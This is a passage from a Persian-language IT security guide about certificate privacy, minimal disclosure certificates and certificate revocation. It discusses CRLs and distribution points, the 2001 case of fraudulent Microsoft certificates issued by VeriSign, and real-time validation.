ﻣﺠﻮﺯﻫﺎﻱ ﺩﻳﺠﻴﺘﺎﻟﻲ ﺑﺮﺍﻱ ﺯﻧﺪﮔﻲ ﺧﺼﻮﺻﻲ ﻛﺎﺭﺑﺮﺍﻥ ﺧـﻮﺩ ﻳـﻚ ﺗﻬﺪﻳـﺪ ﺑـﻪ ﻫﻤـﺮﺍﻩ ﺩﺍﺭﻧـﺪ .ﺯﻣﺎﻧﻴﻜـﻪ ﺷـﻤﺎ ﻳـﻚ ﮔـﻮﺍﻫﻲ ﺭﺍ ﺑـﻪ ﻳـﻚ
ﺳﺮﻭﻳﺲﺩﻫﻨﺪﻩ ﺍﺭﺍﺋﻪ ﻣﻲﺩﻫﻴﺪ ﺳﺮﻭﻳﺲﺩﻫﻨﺪﻩ ﻣﻲﺗﻮﺍﻧﺪ ﺑﻪ ﺁﺳﺎﻧﻲ ﻫﻤﺔ ﺍﻃﻼﻋﺎﺕ ﺩﺭ ﻣﻮﺭﺩ ﻫﻮﻳﺖ ﺷﻤﺎ ﻛـﻪ ﺭﻭﻱ ﮔـﻮﺍﻫﻲ ﻭﺟـﻮﺩ ﺩﺍﺭﺩ )ﭼـﻪ
ﺑﺮﺍﻱ ﺗﺼﺪﻳﻖ ﻫﻮﻳﺖ ﺗﻮﺳﻂ ﺁﻥ ﺳﺮﻭﻳﺲﺩﻫﻨﺪﻩ ﻻﺯﻡ ﺑﺎﺷﺪ ﻭ ﭼﻪ ﻻﺯﻡ ﻧﺒﺎﺷﺪ( ﺭﺍ ﺛﺒﺖ ﻛﻨﺪ .ﺩﺭ ﺑﺴﻴﺎﺭﻱ ﺍﺯ ﻣـﻮﺍﺭﺩ ﺳـﺎﺯﻣﺎﻧﻲ ﻛـﻪ ﺍﻳـﻦ ﺍﻃﻼﻋـﺎﺕ ﺭﺍ ﺩﺭ
ﻛﺎﺭﻫﺎﻱ ﺗﺠﺎﺭﻱ ﺑﺪﺳﺖ ﻣﻲﺁﻭﺭﺩ ﺁﺯﺍﺩ ﺍﺳﺖ ﻛﻪ ﺑﺎ ﺁﻥ ﺍﻃﻼﻋﺎﺕ ﻫﺮ ﻛﺎﺭﻱ ﻛﻪ ﺧﻮﺍﺳﺖ ﺍﻧﺠﺎﻡ ﺩﻫﺪ.
ﻳﻚ ﺭﻭﺵ ﺑﺮﺍﻱ ﺑﻪ ﺣﺪﺍﻗﻞ ﺭﺳﺎﻧﺪﻥ ﺗﻬﺪﻳﺪ ﺣﺮﻳﻢ ﺧﺼﻮﺻﻲ ﺍﺳﺘﻔﺎﺩﻩ ﺍﺯ ﻣﺠﻮﺯﻫﺎﻱ ﺍﻓﺸﺎﻱ ﺣﺪﺍﻗﻞ ١٣٩ﺍﺳﺖ .ﺍﻳﻦ ﻣﺠﻮﺯﻫﺎ ﺑﻪ ﻣﺎﻟﻜﺎﻥ ﺧـﻮﺩ
ﻼ ﺯﻧـﻲ
ﺍﺟﺎﺯﻩ ﻣﻲﺩﻫﻨﺪ ﻛﻪ ﺑﺼﻮﺭﺕ ﺍﻧﺘﺨﺎﺑﻲ ﻗﺴﻤﺘﻬﺎﻱ ﺧﺎﺻﻲ ﺭﺍ ﺍﺯ ﺭﻭﻱ ﻣﺠﻮﺯ ﻣﻨﺘﺸﺮ ﻛﻨﻨﺪ ،ﺑﺪﻭﻥ ﺁﻧﻜﻪ ﻗﺴﻤﺘﻬﺎﻱ ﺩﻳﮕﺮ ﻓﺎﺵ ﺷﻮﻧﺪ .ﻣﺜ ﹰ
ﻛﻪ ﻣﻲﺧﻮﺍﻫﺪ ﺑﻪ ﭘﺎﻳﮕﺎﻩ ﻭﺏ ﮔﺮﻭﻩ ﻗﺮﺑﺎﻧﻴﺎﻥ ﺳﺮﻃﺎﻥ ﻭﺍﺭﺩ ﺷﻮﺩ ﻣﻲﺗﻮﺍﻧﺪ ﺍﺯ ﻣﺠﻮﺯﻫﺎﻱ ﺍﻓﺸﺎﻱ ﺣﺪﺍﻗﻞ ﺍﺳﺘﻔﺎﺩﻩ ﻛﻨﺪ ﺗﺎ ﺑﻪ ﺳـﺎﻳﺖ ﻭﺏ ﺛﺎﺑـﺖ
ﻛﻨﺪ ﻛﻪ ﺍﻭ ﻳﻚ ﺯﻥ ﺑﺎﻻﻱ ۲۱ﺳﺎﻝ ﺍﺳﺖ ﻛﻪ ﺳﺮﻃﺎﻥ ﺳﻴﻨﻪ ﺩﺍﺭﺩ ،ﺑﺪﻭﻥ ﺍﻳﻨﻜﻪ ﻧﺎﻡ ﻳﺎ ﺁﺩﺭﺳﺶ ﻓـﺎﺵ ﮔـﺮﺩﺩ .ﻣﻔﻬـﻮﻡ ﻣﺠﻮﺯﻫـﺎﻱ ﺍﻓـﺸﺎﻱ
ﺣﺪﺍﻗﻞ ﺗﻮﺳﻂ ﻳﻚ ﺭﻳﺎﺿﻴﺪﺍﻥ ﺑﻪ ﻧﺎﻡ ﺍﺳﺘﻔﺎﻥ ﺑﺮﻧﺪﺯ ١٤٠ﺍﺑـﺪﺍﻉ ﺷـﺪ ﻭ ﺩﺭ ﻣـﺎﻩ ﻓﻮﺭﻳـﻪ ﺳـﺎﻝ ۲۰۰۰ﮔـﻮﺍﻫﻲ ﺍﻧﺤـﺼﺎﺭﻱ ﺷـﺮﻛﺖ ﻛﺎﻧـﺎﺩﺍﻳﻲ
١٤١Zero Knowledge Systemsﺭﺍ ﻛﺴﺐ ﻛﺮﺩ.
ﻋﻼﻭﻩ ﺑﺮ ﺻﺪﻭﺭ ﮔﻮﺍﻫﻲ ،ﺩﺭﺻﻮﺭﺗﻴﻜﻪ ﻣﺮﮐﺰ ﺻﺪﻭﺭ ﮔﻮﺍﻫﻲ ﺑﻔﻬﻤﺪ ﻛﻪ ﺩﭼﺎﺭ ﺍﺷﺘﺒﺎﻩ ﺷﺪﻩ ﺍﺳﺖ ﻳﺎ ﻛﻠﻴﺪ ﺧﺼﻮﺻﻲ ﻣﻮﺭﺩ ﺳﻮﺀ ﺍﺳـﺘﻔﺎﺩﻩ ﻗـﺮﺍﺭ
ﮔﺮﻓﺘﻪ ﺑﺎﻳﺪ ﺑﺘﻮﺍﻧﺪ ﮔﻮﺍﻫﻲ ﻣﺮﺑﻮﻃﻪ ﺭﺍ ﺑﺎﻃﻞ ﻛﻨﺪ .ﻫﻤﭽﻨﻴﻦ ﺯﻣﺎﻧﻴﻜﻪ ﻣﺪﺕ ﺍﻋﺘﺒﺎﺭ ﻫﺮﻳﻚ ﺍﺯ ﻣﺸﺘﺮﻛﻴﻦ ﺑﻪ ﭘﺎﻳـﺎﻥ ﻣـﻲﺭﺳـﺪ ﮔـﻮﺍﻫﻲ ﺍﻭ ﺑﺎﻳـﺪ
ﺍﺑﻄﺎﻝ ﺷﻮﺩ.
ﻧﻴﺎﺯ ﺑﻪ ﻳﻚ ﻣﻜﺎﻧﻴﺰﻡ ﻋﻤﻠﻲ ﺍﺑﻄﺎﻝ ﺩﺭ ﻣﺎﺭﺱ ﺳﺎﻝ ۲۰۰۱ﻛﺎﻣ ﹰ
ﻼ ﺭﻭﺷﻦ ﺷﺪ ،ﺯﻣﺎﻧﻴﻜﻪ ﻣﺎﻳﻜﺮﻭﺳـﺎﻓﺖ ﺍﻋـﻼﻡ ﻛـﺮﺩ ﻛـﻪ VeriSignﺑـﺮﺍﻱ
ﻓﺮﺩﻱ ﻛﻪ ﺑﻪ ﺩﺭﻭﻍ ﺍﺩﻋﺎ ﻣﻲﻛﻨﺪ ﻳﻜﻲ ﺍﺯ ﻛﺎﺭﻣﻨﺪﺍﻥ ﻣﺎﻳﻜﺮﻭﺳﺎﻓﺖ ﺍﺳﺖ ﻭ ﻧﺎﻣﻲ ﻛﻪ ﺑﻌﻨﻮﺍﻥ ﺷﺮﻛﺖ ﻣﺤﻞ ﻛﺎﺭ ﺍﻭ ﺩﺭ ﻫﺮ ﺩﻭ ﻣﺠﻮﺯ ﺛﺒﺖ ﺷﺪﻩ
ﺷﺮﻛﺖ ﻣﺎﻳﻜﺮﻭﺳﺎﻓﺖ ﺍﺳﺖ ،ﺩﺭ ﻣﺎﻩ ﮊﺍﻧﻮﻳﻪ ﺩﻭ ﻣﺠﻮﺯ ﺻﺎﺩﺭ ﻛﺮﺩﻩ ﺍﺳﺖ .ﻣﺎﻳﻜﺮﻭﺳﺎﻓﺖ ﺍﺷﺎﺭﻩ ﻛﺮﺩ ﻛﻪ "ﺗﻮﺍﻧﺎﻳﻲ ﺍﻣﻀﺎﻱ ﻓﺎﻳﻠﻬﺎﻱ ﺍﺟﺮﺍﻳـﻲ ﺑـﺎ
Man-in-the-Middle
Minimal Disclosure Certificates
Stefan Brands
http://www.wired.com/news/technology/0,1282,34496,00.html
138
139
140
141
ﺑﺨﺶ ﭘﻨﺠﻢ
ﺍﺑﻄﺎﻝ
٣٢٤
ﺭﺍﻫﻨﻤﺎﻱ ﺍﻣﻨﻴﺖ ﻓﻨﺎﻭﺭﻱ ﺍﻃﻼﻋﺎﺕ
ﺍﺳﺘﻔﺎﺩﻩ ﺍﺯ ﻛﻠﻴﺪﻫﺎﻳﻲ ﻣﺪﻋﻲ ﻫﺴﺘﻨﺪ ﺑﻪ ﻣﺎﻳﻜﺮﻭﺳﺎﻓﺖ ﺗﻌﻠﻖ ﺩﺍﺭﻧﺪ ﻣﻲﺗﻮﺍﻧﺪ ﺑﺮﺍﻱ ﻣﻬﺎﺟﻤﻴﻨﻲ ﻛﻪ ﻣﻲﺧﻮﺍﻫﻨﺪ ﻛـﺎﺭﺑﺮﺍﻥ ﺭﺍ ﻭﺍﺩﺍﺭ ﺑـﻪ ﭘـﺬﻳﺮﺵ
١٤٢
ﺍﺟﺮﺍﻱ ﺁﻥ ﻓﺎﻳﻠﻬﺎ ﻛﻨﻨﺪ ﻣﻨﺎﻓﻌﻲ ﺯﻳﺎﺩﻱ ﺩﺍﺷﺘﻪ ﺑﺎﺷﺪ".
ﻓﻬﺮﺳﺖﻫﺎﻱ ﮔﻮﺍﻫﻲﻫﺎﻱ ﺑﺎﻃﻠﻪ
ﻳﻚ ﺷﻴﻮﻩ ﺑﺮﺍﻱ ﺍﺑﻄﺎﻝ ،ﺍﻧﺘﺸﺎﺭ ﻓﻬﺮﺳﺖ ﮔﻮﺍﻫﻲﻫﺎﻱ ﺑﺎﻃﻠﻪ ) ١٤٣(CRLﺍﺳﺖ .ﻳﻚ CRLﻓﻬﺮﺳﺘﻲ ﺍﺳﺖ ﺍﺯ ﻫﻤﺔ ﮔﻮﺍﻫﻲﻫﺎﻳﻲ ﻛـﻪ ﺗﻮﺳـﻂ
CAﺑﺎﻃﻞﺷﺪﻩﺍﻧﺪ ﻭ ﺑﻪ ﺩﻻﻳﻞ ﻣﺨﺘﻠﻒ ﻫﻨﻮﺯ ﻣﻨﻘﻀﻲ ﻧﺸﺪﻩﺍﻧﺪ .ﺩﺭ ﺣﺎﻟﺖ ﺍﻳﺪﻩﺁﻝ ﻫﺮ ﻣﺮﻛﺰ ﺻﺪﻭﺭ ﮔﻮﺍﻫﻲ ﺩﺭ ﻓﻮﺍﺻﻞ ﺯﻣـﺎﻧﻲ ﻣـﻨﻈﻢ ﻳـﻚ
CRLﻣﻨﺘﺸﺮ ﻣﻲﻛﻨﺪ CRL .ﺩﺭ ﻛﻨﺎﺭ ﻓﻬﺮﺳﺖ ﻛﺮﺩﻥ ﮔﻮﺍﻫﻲﻫﺎﻱ ﺍﺑﻄﺎﻝ ﺷﺪﻩ ،ﻣﺪﺕ ﺯﻣﺎﻥ ﺍﻋﺘﺒﺎﺭ ﺩﺍﺷﺘﻦ ﺧـﻮﺩ ﻭ ﻧﺤـﻮﺓ ﺩﺭﻳﺎﻓـﺖ CRL
ﺑﻌﺪﻱ ﺭﺍ ﻧﻴﺰ ﻣﺸﺨﺺ ﻣﻲﻛﻨﺪ.
ﺩﺭﺣﺎﻝ ﺣﺎﺿﺮ ﮔﻮﺍﻫﻲﻫﺎﻱ X.509 v3ﺑﺎﻳﺪ ﺷﺎﻣﻞ ﻗﺴﻤﺘﻲ ﺑﺎﺷﻨﺪ ﻛﻪ ﻧﻘﻄﺔ ﺗﻮﺯﻳﻊ ١٤٤(CDP) CRLﻧﺎﻣﻴﺪﻩ ﻣﻲﺷـﻮﺩ .ﺍﺯ ﻟﺤـﺎﻅ ﻧﻈـﺮﻱ،
ﺑﺮﻧﺎﻣﻪﺍﻱ ﻛﻪ ﺑﺨﻮﺍﻫﺪ ﺍﻋﺘﺒﺎﺭ ﻳﻚ ﮔﻮﺍﻫﻲ ﺭﺍ ﺗﺼﺪﻳﻖ ﻛﻨﺪ ﺑﺎﻳﺪ ﺑﺘﻮﺍﻧﺪ ﻳﻚ CRLﺭﺍ ﺍﺯ CDPﻣﺮﺑﻮﻃﻪ ﺩﺭﻳﺎﻓﺖ ﻛﻨﺪ ﺗﺎ ﺑﺘﻮﺍﻧﺪ ﻣﻌﻴﻦ ﻛﻨﺪ ﻛﻪ
ﺁﻳﺎ ﮔﻮﺍﻫﻲ ﺍﺑﻄﺎﻝ ﺷﺪﻩ ﺍﺳﺖ ﻳﺎ ﻧﻪ .ﺍﺯ ﺁﻧﺠﺎ ﻛﻪ ﺑﻴﺸﺘﺮ ﮔﻮﺍﻫﻲﻫﺎ ﺗﻮﺳﻂ ﺗﻌﺪﺍﺩ ﺍﻧﺪﻛﻲ ﺍﺯ ﻣﺮﺍﮐﺰ ﺻﺪﻭﺭ ﮔﻮﺍﻫﻲ ﺻﺎﺩﺭ ﻣﻲﺷﻮﻧﺪ ،ﻣﻨﻄﻘﻲ ﺍﺳـﺖ
ﺍﮔﺮ ﺗﺼﻮﺭ ﻛﻨﻴﻢ ﻛﻪ ﻳﻚ ﺑﺮﻧﺎﻣﻪ ﻣﻲﺗﻮﺍﻧﺪ CRLﺟﺪﻳﺪ ﺭﺍ ﻫﺮ ﺭﻭﺯ ﻳﺎ ﻫﺮ ﺳﺎﻋﺖ ﺩﺭﻳﺎﻓﺖ ﻛﻨﺪ ،ﻭ ﺁﻧﮕﺎﻩ ﺍﻳﻦ ﻓﻬﺮﺳﺖ ﺭﺍ ﺑـﺮﺍﻱ ﺟـﺴﺘﺠﻮﻫﺎﻱ
ﭘﻴﺎﭘﻲ ﺩﺭ ﺣﺎﻓﻈﻪ ﻧﮕﻪ ﺩﺍﺭﺩ .ﻳﻚ ﺳﺎﺯﻣﺎﻥ ﻛﻪ ﺍﺭﺗﺒﺎﻁ ﺍﻳﻨﺘﺮﻧﺘﻲ ﻣﺤﺪﻭﺩ ﺩﺍﺭﺩ ﻣﻲﺗﻮﺍﻧﺪ ﻳﻜﺒﺎﺭ CRLﺭﺍ downloadﻭ ﺁﻧﺮﺍ ﻣﻴـﺎﻥ ﻛـﺎﺭﺑﺮﺍﻧﺶ
ﺗﻮﺯﻳﻊ ﻛﻨﺪ.
ﺩﺭ ﻋﻤﻞCRL ،ﻫﺎ ﻭ CDPﻫﺎ ﭼﻨﺪﻳﻦ ﻣﺸﻜﻞ ﺩﺍﺭﻧﺪ:
•
•
•
ﺍﮔﺮ ﻣﺮﮐﺰ ﺻﺪﻭﺭ ﮔﻮﺍﻫﻲ ﺧﻴﻠﻲ ﻣﺸﻬﻮﺭ ﺑﺎﺷﺪ ﺍﺣﺘﻤﺎﻝ ﺩﺍﺭﺩ ﻛﻪ CRLﻫﺎ ﺧﻴﻠﻲ ﺑﺰﺭﮒ ﺑﺎﺷـﻨﺪ Download .ﻛـﺮﺩﻥ ﻳـﻚ ﻓﻬﺮﺳـﺖ
ﻼ ۹۰۰ﻛﻴﻠﻮﺑﺎﻳﺖ ﺍﺯ ﻃﺮﻳﻖ ﺍﺗﺼﺎﻝ ﺗﻠﻔﻨﻲ ﺑﻪ ﺳﺮﻭﻳﺲﺩﻫﻨﺪﺓ SSLﻣﺮﮐـﺰ ﺻـﺪﻭﺭ ﮔـﻮﺍﻫﻲ VeriSignﻣﻤﮑـﻦ
CRLﺑﺎ ﺣﺠﻢ ﻣﺜ ﹰ
ﺍﺳﺖ ﺑﻴﺶ ﺍﺯ ۲۰ﺩﻗﻴﻘﻪ ﻭﻗﺖ ﺑﮕﻴﺮﺩ؛
ﻣﻴﺎﻥ ﺯﻣﺎﻧﻲ ﻛﻪ ﮔﻮﺍﻫﻲ ﺍﺑﻄﺎﻝ ﻣﻲﺷﻮﺩ ﻭ ﺯﻣﺎﻧﻲ ﻛﻪ CRLﺟﺪﻳﺪ ﺗﻮﺯﻳﻊ ﻣﻲﺷﻮﺩ ﻳﻚ ﺑـﺎﺯﺓ ﺯﻣـﺎﻧﻲ ﻭﺟـﻮﺩ ﺩﺍﺭﺩ ﻛـﻪ ﺩﺭ ﺁﻥ ﮔـﻮﺍﻫﻲ
ﻣﻌﺘﺒﺮ ﺑﻨﻈﺮ ﻣﻲﺁﻳﺪ ،ﺩﺭﺣﺎﻟﻴﻜﻪ ﺍﻳﻨﮕﻮﻧﻪ ﻧﻴﺴﺖ؛ ﻭ
ﺑﺴﻴﺎﺭﻱ ﺍﺯ ﺑﺮﻧﺎﻣﻪﻫﺎCRL ،ﻫﺎ ﻭ CDPﻫﺎ ﺭﺍ ﺑﺼﻮﺭﺕ ﺻﺤﻴﺢ ﭘﻴﺎﺩﻩﺳﺎﺯﻱ ﻧﻤﻲﻛﻨﻨﺪ.
ﺩﺭ ﻣﻮﺭﺩ ﺻﺪﻭﺭ ﮔﻮﺍﻫﻲﻫﺎﻱ ﺟﻌﻠﻲ ﻣﺎﻳﻜﺮﻭﺳﺎﻓﺖ ﻛﻪ ﭘﻴﺸﺘﺮ ﺍﺷـﺎﺭﻩ ﺷـﺪ ،ﮔـﻮﺍﻫﻲﻫـﺎﻱ ﻧﺎﺩﺭﺳـﺖ ﺑﺎﻃـﻞ ﺷـﺪﻧﺪ ﻭ ﺩﺭ CRLﻣﺮﺑـﻮﻁ ﺑـﻪ
VeriSignﺁﻣﺪﻧﺪ ،ﺍﻣﺎ ﻣﺘﺄﺳﻔﺎﻧﻪ ﮔﻮﺍﻫﻲﻫﺎﻳﻲ ﻛﻪ VeriSignﺻﺎﺩﺭ ﻛﺮﺩﻩ ﺑﻮﺩ ﺣﺎﻭﻱ CDPﻫـﺎﻱ ﻣﻌﺘﺒـﺮ ﻧﺒـﻮﺩ) .ﻃﺒـﻖ ﺍﻋـﻼﻡ ،VeriSign
ﺑﺪﻟﻴﻞ ﻳﻚ ﺍﺷﻜﺎﻝ ﺩﺭ ﭘﻴﺎﺩﻩﺳﺎﺯﻱ Authenticodeﻛﻪ ﻫﻤﺮﺍﻩ Internet Explorer 3.02ﺗﻮﺯﻳﻊﺷﺪﻩCDP ،ﻫﺎ ﺩﺭ ﮔﻮﺍﻫﻲﻫﺎﻱ Authenticodeﻭﺟﻮﺩ ﻧﺪﺍﺭﻧﺪ(.
ﺑﺪﻭﻥ ﻭﺟﻮﺩ ،CDPﺑﺮﻧﺎﻣﻪﺍﻱ ﻛﻪ ﺗﻼﺵ ﻣﻲﻛﺮﺩ ﺍﻋﺘﺒﺎﺭ ﮔﻮﺍﻫﻲ ﺟﻌﻠﻲ ﺻﺎﺩﺭ ﺷﺪﻩ ﺭﺍ ﺗﺼﺪﻳﻖ ﻛﻨﺪ ،ﻧﻤﻲﺩﺍﻧﺴﺖ ﻛـﻪ CRLﻣﺮﺑﻮﻃـﻪ ﻛـﻪ
١٤٥
ﮔﻮﺍﻫﻲﻫﺎﻱ ﺑﺎﻃﻠﻪ ﺩﺭ ﺁﻥ ﻓﻬﺮﺳﺖ ﺷﺪﻩ ﺑﻮﺩﻧﺪ ﺭﺍ ﺍﺯ ﻛﺠﺎ ﺑﺎﻳﺪ ﺩﺭﻳﺎﻓﺖ ﻣﻲﻛﺮﺩ.
ﺍﺭﺯﻳﺎﺑﻲ ﺑﻼﺩﺭﻧﮓ ﮔﻮﺍﻫﻲﻫﺎ
ﻳﻚ ﺭﺍﻩ ﺟﺎﻳﮕﺰﻳﻦ ﺑﺮﺍﻱ CRLﻫﺎ ،ﺍﺭﺯﻳﺎﺑﻲ ﺍﻋﺘﺒﺎﺭ ﮔﻮﺍﻫﻲﻫﺎ ﺑﺼﻮﺭﺕ ﺑﻼﺩﺭﻧﮓ ﺍﺳﺖ .ﻫﺮ ﺯﻣﺎﻥ ﻛﻪ ﻻﺯﻡ ﺑﺎﺷﺪ ﻳﻚ ﮔﻮﺍﻫﻲ ﺍﺭﺯﻳﺎﺑﻲ ﺍﻋﺘﺒـﺎﺭ
ﺷﻮﺩ ﺑﺼﻮﺭﺕ onlineﺑﺎ ﻣﺮﻛﺰ ﺻﺪﻭﺭ ﮔﻮﺍﻫﻲ ﻣﺸﻮﺭﺕ ﻣﻲﻛﻨﺪ .ﺳﻴﺴﺘﻤﻬﺎﻱ ﺍﺭﺯﻳﺎﺑﻲ ﺑﻼﺩﺭﻧﮓ ﻣﺸﻜﻞ CRLﺭﺍ ﺑﺨﻮﺑﻲ ﺣـﻞ ﻣـﻲﻛﻨﻨـﺪ،
ﻫﺮﭼﻨﺪ ﮐﻪ ﺑﻪ ﻳﻚ ﺷﺒﻜﺔ ﻗﺎﺑﻞ ﺍﻋﺘﻤﺎﺩ ﻭ ﻣﻌﺘﺒﺮ ﻧﻴﺎﺯ ﺩﺍﺭﻧﺪ.
142 http://www.microsoft.com/technet/security/bulletin/MS01-017.asp
143 Certificate Revocation Lists
144 CRL Distribution Point
۱۴۵ﺩﺭ ﭘﺎﻳﺎﻥ ﻣﺎﻳﻜﺮﻭﺳﺎﻓﺖ ﻣﺠﺒﻮﺭ ﺷﺪ ﻳﻚ ﻭﺻﻠﺔ ﺳﻴﺴﺘﻢﻋﺎﻣﻞ ﺻﺎﺩﺭ ﻛﻨﺪ ﺗﺎ ﻣﺸﻜﻞ ﺣﻞ ﺷﻮﺩ .ﺍﺻـﻼﺡ ﻣـﻮﺭﺩ ﺍﺷـﺎﺭﻩ ﺣـﺎﻭﻱ ﻳـﻚ CDPﺍﺿـﺎﻓﻪ ﺑـﻮﺩ ﻛـﻪ Internet
Explorerﺭﺍ ﺑﻪ ﺩﺭﻳﺎﻓﺖ ﺍﻃﻼﻋﺎﺕ ﺍﺯ ﻳﻚ CRLﻣﺤﻠﻲ ﻭﺍﺩﺍﺭ ﻣﻲﻛﺮﺩ ﺗﺎ ﺍﻋﺘﺒﺎﺭ ﮔﻮﺍﻫﻲﻫﺎ ﺭﺍ ﺍﺭﺯﻳﺎﺑﻲ ﻛﻨﺪ ،ﻭ ﻧﻴﺰ ﻳﻚ ﻓﻬﺮﺳﺖ CRLﻛﻪ ﺩﻭ ﮔﻮﺍﻫﻲ ﺍﺷﺘﺒﺎﻩ ﺻﺎﺩﺭ ﺷﺪﻩ
ﺗﻮﺳﻂ VeriSignﺩﺭ ﺁﻥ ﺑﻮﺩ.
ﺑﺨﺶ ﭘﻨﺠﻢ :ﺍﻣﻨﻴﺖ ﻓﻨﺎﻭﺭﻱ ﺍﻃﻼﻋﺎﺕ ﻭ ﺭﺍﻫﺒﺮﺍﻥ ﻓﻨﻲ
٣٢٥
ﻲ ﺍﻋﺘﺒﺎ ﹺﺭ ﮔﻮﺍﻫﻲ ،ﻣﺸﻜﻞ "ﻣﻘﻴﺎﺱ" ﺍﺳﺖ .ﺍﺯ ﺁﻧﺠﺎ ﻛﻪ ﮔﻮﺍﻫﻲﻫﺎ ﻛﺎﺭﺑﺮﺍﻥ ﺑﻴﺸﺘﺮ ﻭ ﺑﻴﺸﺘﺮﻱ ﭘﻴﺪﺍ
ﻣﺸﻜﻞ ﺍﻭﻝ ﺩﺭ ﺳﻴﺴﺘﻤﻬﺎﻱ ﺑﻼﺩﺭﻧﮓ ﺍﺭﺯﻳﺎﺑ ﹺ
ﻣﻲﻛﻨﻨﺪ ،ﺳﺮﻭﻳﺲﺩﻫﻨﺪﻩﻫﺎﻱ ﺍﺭﺯﻳﺎﺑﻲ ﺍﻋﺘﺒﺎﺭ ﻧﻴﺎﺯ ﺩﺍﺭﻧﺪ ﺳﺮﻳﻌﺘﺮ ﻭ ﺳﺮﻳﻌﺘﺮ ﺷﻮﻧﺪ ﺗﺎ ﺑﺘﻮﺍﻧﻨﺪ ﺑﻪ ﺟﺎﻣﻌﺔ ﺩﺭﺣﺎﻝ ﺭﺷﺪ ﻛـﺎﺭﺑﺮﺍﻥ ،ﺍﺭﺍﺋـﻪ ﺧـﺪﻣﺎﺕ
ﺩﻫﻨﺪ .ﻋﻼﻭﻩ ﺑﺮ ﺍﻳﻦ ﺳﻴﺴﺘﻤﻬﺎﻱ ﺑﻼﺩﺭﻧﮓ ﻧﺴﺒﺖ ﺑﻪ ﺣﻤﻼﺕ ﺧﺮﺍﺑﻲ ﺳﺮﻭﻳﺲ ﺁﺳﻴﺐﭘﺬﻳﺮ ﻫﺴﺘﻨﺪ .ﺍﮔﺮ ﻳﻚ ﺷﺮﻛﺖ ﺗﺠﺎﺭﻱ ﺍﻣﻜﺎﻥ ﺍﺗﺼﺎﻝ
ﺑﻪ ﺳﺮﻭﻳﺲﺩﻫﻨﺪﺓ ﺍﺑﻄﺎﻝ ﺭﺍ ﻧﺪﺍﺷﺘﻪ ﺑﺎﺷﺪ ،ﺑﺎ ﻳﻚ ﮔﻮﺍﻫﻲ ﺑﺎﻳﺪ ﭼﮕﻮﻧﻪ ﺑﺮﺧﻮﺭﺩ ﻛﻨﺪ؟ ﺑﻪ ﺁﻥ ﺍﻋﺘﻤﺎﺩ ﻛﻨﺪ ﻳﺎ ﺍﻋﺘﺒﺎﺭﻱ ﺑـﺮﺍﻱ ﺁﻥ ﻗﺎﺋـﻞ ﻧـﺸﻮﺩ؟
ﺍﮔﺮ ﭘﻴﺶﻓﺮﺽ ﺍﻋﺘﻤﺎﺩ ﻛﺮﺩﻥ ﺑﺎﺷﺪ ،ﻣﻬﺎﺟﻢ ﻣﻲﺗﻮﺍﻧﺪ ﺑﺎ ﻓﺮﺳﺘﺎﺩﻥ ﺩﺭﺧﻮﺍﺳﺘﻬﺎﻱ ﻣﺠﺎﺯﻱ ﺑﺴﻴﺎﺭ ﺯﻳﺎﺩ ﺑﻪ ﺳﺮﻭﻳﺲﺩﻫﻨﺪﺓ ﺍﺑﻄﺎﻝ ﻣﻮﺟﺐ ﺍﺯ ﻛﺎﺭ
ﺍﻓﺘﺎﺩﻥ ﺁﻥ ﺩﺭ ﺯﻣﺎﻥ ﺍﺳﺘﻔﺎﺩﻩ ﺍﺯ ﻳﻚ ﮔﻮﺍﻫﻲ ﻧﺎﻣﻌﺘﺒﺮ ﺷﻮﺩ .ﺍﮔﺮ ﭘﻴﺶﻓﺮﺽ ﺑﻲﺍﻋﺘﻤﺎﺩﻱ ﺑﺎﺷﺪ ،ﺍﻳﻦ ﺍﻣﻜﺎﻥ ﻭﺟﻮﺩ ﺩﺍﺭﺩ ﻛﻪ ﻣﻬﺎﺟﻢ ﺑﺎ ﺍﺳـﺘﻔﺎﺩﻩ
ﺍﺯ ﺣﻤﻼﺕ ﺗﺨﺮﻳﺐ ﺳﺮﻭﻳﺲ ﺑﺎﻋﺚ ﺷﻮﺩ ﺳﺮﻭﻳﺲﺩﻫﻨﺪﺓ ﺍﺑﻄﺎﻝ ﺩﺭ ﺩﺳﺘﺮﺱ ﻧﺒﺎﺷﺪ ﻭ ﺩﺭﻧﺘﻴﺠﻪ ﻛﻠﻴﺔ ﺗﺮﺍﻛﻨﺸﻬﺎ ﺭﺩ ﺷﻮﻧﺪ ،ﻭ ﺍﻋﺘﺒـﺎﺭ ﺷـﺮﻛﺖ
ﺑﺴﺮﻋﺖ ﺧﺪﺷﻪﺩﺍﺭ ﮔﺮﺩﺩ.
ﺯﻳﺮﺳﺎﺧﺖ ﻛﻠﻴﺪ ﻋﻤﻮﻣﻲ
ﺯﻳﺮﺳﺎﺧﺖ ﻛﻠﻴﺪ ﻋﻤﻮﻣﻲ ) (PKIﺷﺎﻣﻞ ﻣﻮﺍﺭﺩﻱ ﭼﻮﻥ ﺳﻴﺴﺘﻢ ﮔﻮﺍﻫﻲﻫﺎﻱ ﺩﻳﺠﻴﺘﺎﻟﻲ ،ﻣﺮﺍﻛـﺰ ﺻـﺪﻭﺭ ﮔـﻮﺍﻫﻲ ،ﺍﺑﺰﺍﺭﻫـﺎ ،ﺳﻴـﺴﺘﻤﻬﺎ ،ﻭ ﻧﻴـﺰ
ﺳﺨﺖﺍﻓﺰﺍﺭﻱ ﺍﺳﺖ ﻛﻪ ﺑﺮﺍﻱ ﺑﻜﺎﺭ ﮔﺮﻓﺘﻦ ﻓﻨﺎﻭﺭﻱ ﻛﻠﻴﺪ ﻋﻤﻮﻣﻲ ﺍﺯ ﺁﻧﻬﺎ ﺍﺳﺘﻔﺎﺩﻩ ﻣﻲﺷﻮﺩ.
ﺩﻳﺪ ﺑﺴﻴﺎﺭﻱ ﺍﺯ ﻃﺮﻓﺪﺍﺭﺍﻥ ﺍﻭﻟﻴﻪ ﺑﻪ ،PKIﻳﻚ ﺳﻴﺴﺘﻢ ﻣﺘﻤﺮﻛﺰ ﺑﻮﺩ ﻛﻪ ﺑﺎﻳﺪ ﺑﻮﺳﻴﻠﺔ ﺩﻭﻟﺘﻬﺎ ﭘﻴﺎﺩﻩﺳﺎﺯﻱ ﻣﻲﺷﺪ ﺗﺎ ﮔـﻮﺍﻫﻲﻫـﺎﻱ ﺩﻳﺠﻴﺘـﺎﻟﻲ
